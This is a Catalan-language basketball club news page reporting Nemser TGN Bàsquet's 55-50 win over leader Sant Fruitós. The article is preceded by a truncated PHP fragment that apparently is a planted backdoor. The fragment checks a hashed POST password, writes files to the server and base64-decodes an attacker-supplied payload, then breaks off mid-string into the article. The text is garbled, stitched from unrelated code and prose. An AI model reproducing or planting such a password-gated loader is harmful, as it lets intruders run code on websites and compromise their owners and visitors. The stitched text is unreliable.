function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser es sobreposa a les adversitats i venç el líder, el Sant Fruitós, en un partit duríssim (55-50) - Tgn Bàsquet Club -

El Nemser es sobreposa a les adversitats i venç el líder, el Sant Fruitós, en un partit duríssim (55-50)

Updated: març 29, 2014

Èpic i brillant. Així es pot qualificar el triomf del Nemser TGN Bàsquet contra el rival més dur de la lliga, el Sant Fruitós, que arribava al pavelló del Sagrat Cor amb l’etiqueta de favorit. La victòria va ser èpica perquè el conjunt que entrena Juan Carlos Arjona es troba en quadre després de patir dues lesions més. A les baixes d’Esther Cabré, que ja fa setmanes que no juga per una lesió al genoll i que no tornarà a la competició en molts mesos, també calia afegir de sortida la de Montse Magre, amb problemes de fascitis plantar de fa jornades. Durant el partit es van produir dues desgràcies més. Primer va ser Irene Villegas que, tot fent una penetració a cistella, després de salt, es va fer mal al genoll dret al poc de començar (minut 5)  i ja no va poder tornar a la pista. En la segona meitat, a mitjans del tercer període, Mari Carme Martí va patir una lesió semblant, tot i que al genoll esquerre, i tampoc va poder continuar ajudant l’equip. El triomf també cal qualificar-lo de brillant perquè el Nemser TGN Bàsquet va ser capaç de fer un parcial de 9-0 a falta de 2:21 després d’un temps mort d’Arjona i va culminar d’aquesta manera una actuació sensacional que referma l’equip lila a la part mitja de la taula classificatòria.

El partit va ser molt dur. El Sant Fruitós va ser castigat amb dues faltes antiesportives, mentre que el Nemser TGN Bàsquet va rebre una falta tècnica a la banqueta per protestar. Els tirs lliures van ser cabdals perquè se’n van llençar molts i en aquest aspecte cal destacar tot l’equip per la serenor que va tenir en els moments clau (que van ser tots en un partit tan igualat) i, en especial Gina Fort. La petita base de l’equip lila va fer un partidàs. Freda des de la línia de personal, va defensar de forma sobèrbia i, tot i ser la més baixeta dels dos equips, va ajudar molt en el rebot. El premi a la feina ben feta va arribar a 7 segons del final. El Nemser guanyava per 3 punts (53-50) i, després d’un temps mort, el Sant Fruitós va treure de banda per intentar forçar la pròrroga. No va tenir ni tan sols l’oportunitat de mirar el cèrcol. Gina Fort es va anticipar a la seva oponent i va enfilar el camí cap a cistella tota sola anotant el 55-50 final entre el deliri de les seves companyes i de la graderia, que enregistrava una bona entrada.

El matx va ser dominat pel Nemser TGN Bàsquet a l’inici gràcies a la seva bona defensa. El Sant Fruitós va tenir molts problemes en atac, tot i que va fallar a l’inici molts tirs còmodes, i això ho va aprofitar el conjunt local per agafar confiança i dur la batuta del partit (8-6 al final del primer període). Amb el líder embussat en atac, el Nemser, tot i perdre un referent ofensiu com Villegas, va jugar uns minuts primorosos. En un tres i no res, gràcies a la bona circulació de pilota, les locals van obrir un forat considerable (22-8, minut 15) que va ser respost amb contundència pel Sant Fruitós, que va poder arribar al descans amb un desavantatge més curt (25-22). En la segona meitat, les visitants van seguir amb la línia exhibida al final del segon quart i semblava que decantaven el partit al seu costat (27-31, a 3:48 del final del tercer període). Malgrat tot, un triple d’Ona Fort mantenia les esperances del Nemser TGN Bàsquet de cara a l’últim període (37-38).  Els deu minuts següents van ser d’infart. Els dos equips van jugar de poder a poder, sense arronsar-se i el partit no va tenir cap tipus de treva. Les locals van fer un treball extraordinari en defensa i en la lluita pel rebot, sense donar cap pilota per perduda i, en atac, van jugar amb molt criteri. D’aquesta manera la igualtat va ser màxima (46-46, minut 36) fins que va arribar el punt d’inflexió. Arjona va demanar el temps mort, va variar la defensa -el Sant Fruitós havia trobat massa fàcilment les jugadores interiors- i va vèncer aconseguint una victòria de prestigi.